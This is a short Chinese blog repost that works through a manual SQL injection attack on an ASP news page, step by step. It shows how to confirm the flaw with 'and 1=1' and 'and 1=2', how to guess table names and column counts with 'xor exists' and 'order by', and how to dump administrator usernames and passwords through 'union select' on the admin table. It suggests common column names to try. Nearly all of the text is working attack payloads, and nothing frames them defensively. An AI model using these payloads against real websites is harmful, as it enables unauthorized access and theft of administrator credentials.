1.检测是否存在注入漏洞
错误 and 1=1正常 and 1=2 错误
注入点:http://www.XXXX.com.cn/newsShow.asp?id=88
2.猜解表段
猜表段:xor exists (select * from 要猜解的表段的名字)
猜表段:xor exists (select * from admin)
3.猜解字段
猜字段数:order by 要猜解的字段数 正确返回正常的页面,猜解错误的话返回错误的页面
猜字段数:order by 5 说明有5个字段数
4..检测内容 后台账号
xor 1=2 union select 1,2,3,4,5 from 要检测内容的表段
xor 1=2 union select 1,2,3,4,5 from admin 检测字段的内容
常见的字段内容username user name admin_name
xor 1=2 union select 1,admin_name,3,4,5 from admin
5. 猜解密码 后台密码
常见的密码字段 pass passwd password
xor 1=2 union select 1,admin_name,password,4,5 from admin
本文转自 zhangguangyi 51CTO博客,原文链接:http://blog.51cto.com/bosszhang/927287
